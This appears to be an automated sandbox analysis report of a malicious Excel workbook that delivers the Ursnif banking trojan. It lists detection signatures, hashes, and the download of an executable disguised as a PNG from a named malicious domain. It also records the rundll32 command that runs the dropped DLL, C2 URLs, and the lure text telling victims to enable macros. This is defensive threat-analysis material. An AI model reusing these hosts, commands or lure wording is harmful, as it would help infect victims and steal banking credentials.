Analysis Report OCC-221220-TBU1XAT7X4.xls

Overview

General Information

Sample Name: OCC-221220-TBU1XAT7X4.xls
Analysis ID: 333660
MD5: c4356a3b949b77bce8be5ecf2def64db
SHA1: e5de9340e03e98e6e0b8f6630cfd40295a6c9881
SHA256: 7389677e946cac4226da9b84eca90b94b59d46cf2bf4541ea58d96d39e6669d5
Tags: goziIFSBUrsnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Ursnif
Creates a COM Internet Explorer object
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes registry values via WMI
AV process strings found (often used to terminate AV products)
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].png Avira: detection malicious, Label: HEUR/AGEN.1138179
Source: C:\Users\user\cnvmb.rty Avira: detection malicious, Label: HEUR/AGEN.1138179
Antivirus or Machine Learning detection for unpacked file
Source: 4.2.rundll32.exe.1c0000.0.unpack Avira: Label: TR/Patched.Ren.Gen

Software Vulnerabilities:

barindex
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: ox9[1].png.0.dr Jump to dropped file
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA Jump to behavior
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe Jump to behavior
Allocates a big amount of memory (probably used for heap spraying)
Source: excel.exe Memory has grown: Private usage: 4MB later: 54MB

Networking:

barindex
Creates a COM Internet Explorer object
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER_CLASSES\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgID Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgID Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046} Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32 Jump to behavior
Downloads files with wrong headers with respect to MIME Content-Type
Source: http Image file has PE prefix: HTTP/1.1 200 OK Date: Wed, 23 Dec 2020 13:48:46 GMT Server: Apache/2.4.25 (Debian) Last-Modified: Tue, 22 Dec 2020 12:15:21 GMT ETag: "3a400-5b70c874cc840" Accept-Ranges: bytes Content-Length: 238592 Connection: close Content-Type: image/png Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 44 a5 bf ed 25 cb ec ed 25 cb ec ed 25 cb ec 82 3a c0 ec ec 25 cb ec 6e 39 c5 ec f9 25 cb ec 82 3a c1 ec d5 25 cb ec e4 5d 58 ec eb 25 cb ec ca e3 b0 ec ee 25 cb ec ed 25 ca ec bf 25 cb ec e4 5d 4f ec ec 25 cb ec e4 5d 59 ec ec 25 cb ec f3 77 5f ec ec 25 cb ec e4 5d 5a ec ec 25 cb ec 52 69 63 68 ed 25 cb ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 4c f5 5b 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 b6 01 00 00 20 02 00 00 00 00 00 90 1e 00 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 04 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 e6 01 00 4b 00 00 00 64 de 01 00 64 00 00 00 00 e0 03 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 48 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5b 16 00 00 00 d0 01 00 00 18 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 ed 01 00 00 f0 01 00 00 b8 01 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 09 00 00 00 e0 03 00 00 0a 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 0e 00 00 00 f0 03 00 00 10 00 00 00 94 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 23 Dec 2020 13:48:46 GMTServer: Apache/2.4.25 (Debian)Last-Modified: Tue, 22 Dec 2020 12:15:21 GMTETag: "3a400-5b70c874cc840"Accept-Ranges: bytesContent-Length: 238592Connection: closeContent-Type: image/pngData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 44 a5 bf ed 25 cb ec ed 25 cb ec ed 25 cb ec 82 3a c0 ec ec 25 cb ec 6e 39 c5 ec f9 25 cb ec 82 3a c1 ec d5 25 cb ec e4 5d 58 ec eb 25 cb ec ca e3 b0 ec ee 25 cb ec ed 25 ca ec bf 25 cb ec e4 5d 4f ec ec 25 cb ec e4 5d 59 ec ec 25 cb ec f3 77 5f ec ec 25 cb ec e4 5d 5a ec ec 25 cb ec 52 69 63 68 ed 25 cb ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 4c f5 5b 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 b6 01 00 00 20 02 00 00 00 00 00 90 1e 00 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 04 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 e6 01 00 4b 00 00 00 64 de 01 00 64 00 00 00 00 e0 03 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 48 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5b 16 00 00 00 d0 01 00 00 18 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 ed 01 00 00 f0 01 00 00 b8 01 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 09 00 00 00 e0 03 00 00 0a 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 0e 00 00 00 f0 03 00 00 10 00 00 00 94 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ Jump to behavior
Source: global traffic HTTP traffic detected: GET /ox9.png HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: companieshouseonlinedownload.comConnection: Keep-Alive
Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: companieshouseonlinedownload.com
Source: rundll32.exe, 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp String found in binary or memory: http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.11.dr String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: OCC-221220-TBU1XAT7X4.xls, before.2.0.0.sheet.csv_unpack String found in binary or memory: http://companieshouseonlinedownload.com/ox9.png
Source: rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: 77EC63BDA74BD0D0E0426DC8F8008506.11.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmp String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000004.00000002.2420654046.00000000023A0000.00000002.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000004.00000002.2420654046.00000000023A0000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.comPA
Source: rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: rundll32.exe, 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp String found in binary or memory: https://hospader.xyz
Source: imagestore.dat.11.dr String found in binary or memory: https://hospader.xyz/favicon.ico
Source: rundll32.exe, 00000003.00000002.2420076289.0000000000730000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420139760.000000000064D000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.2420212763.0000000000A30000.00000002.00000001.sdmp, ~DF3C5C2A9E584434E2.TMP.10.dr String found in binary or memory: https://hospader.xyz/index.htm
Source: rundll32.exe, 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp String found in binary or memory: https://hospader.xyz/index.htm1
Source: {5591F91E-4571-11EB-ADCF-ECF4BBB5915B}.dat.10.dr String found in binary or memory: https://hospader.xyz/index.htmRoot
Source: rundll32.exe, 00000004.00000002.2420139760.000000000064D000.00000004.00000020.sdmp String found in binary or memory: https://hospader.xyz/index.htma;
Source: {5591F91E-4571-11EB-ADCF-ECF4BBB5915B}.dat.10.dr String found in binary or memory: https://hospader.xyz/index.htmndex.htm
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49176 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2536, type: MEMORY

E-Banking Fraud:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2536, type: MEMORY

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: Enable editing" to unlock the ed't'ng document d2n|oaded from the 'nternet "7 0Protected View This
Source: Screenshot number: 4 Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start g) the decryption of the documen
Source: Document image extraction number: 2 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet."7 0Protected View This
Source: Document image extraction number: 2 Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
Source: Document image extraction number: 3 Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
Source: Document image extraction number: 3 Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
Found Excel 4.0 Macro with suspicious formulas
Source: OCC-221220-TBU1XAT7X4.xls Initial sample: CALL
Source: OCC-221220-TBU1XAT7X4.xls Initial sample: EXEC
Office process drops PE file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\cnvmb.rty Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].png Jump to dropped file
Writes registry values via WMI
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10002415 NtQueryVirtualMemory, 4_2_10002415
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_001A1757 memcpy,memcpy,lstrcatW,CreateEventA,NtQueryInformationProcess,CloseHandle, 4_2_001A1757
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_001A4DF0 NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,RtlNtStatusToDosError, 4_2_001A4DF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_001AAC53 RtlInitUnicodeString,NtClose,RtlNtStatusToDosError, 4_2_001AAC53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_001A6101 RtlNtStatusToDosError,NtClose, 4_2_001A6101
Detected potential crypto function
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_100021F4 4_2_100021F4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_001AC490 4_2_001AC490
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_001AB8DC 4_2_001AB8DC
Document contains embedded VBA macros
Source: OCC-221220-TBU1XAT7X4.xls OLE indicator, VBA macros: true
Yara signature match
Source: OCC-221220-TBU1XAT7X4.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.bank.troj.expl.evad.winXLS@10/28@5/2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_001A3553 CoCreateInstance, 4_2_001A3553
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\CDDE0000 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\28835087-CD0E-3290-3D29-EA6553635A2C
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD5A6.tmp Jump to behavior
Source: OCC-221220-TBU1XAT7X4.xls OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe WMI Queries: IWbemServices::ExecQuery - select * from win32_process
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServer
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Windows\System32\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServer
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServer
Source: unknown Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:275457 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:799749 /prefetch:2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServer Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServer Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:275457 /prefetch:2 Jump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:799749 /prefetch:2 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_10001601 GetModuleHandleW,LoadLibraryW,GetProcAddress, 4_2_10001601
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_100021E3 push ecx; ret 4_2_100021F3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_001AC47F push ecx; ret 4_2_001AC48F

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\cnvmb.rty Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].png Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\cnvmb.rty Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
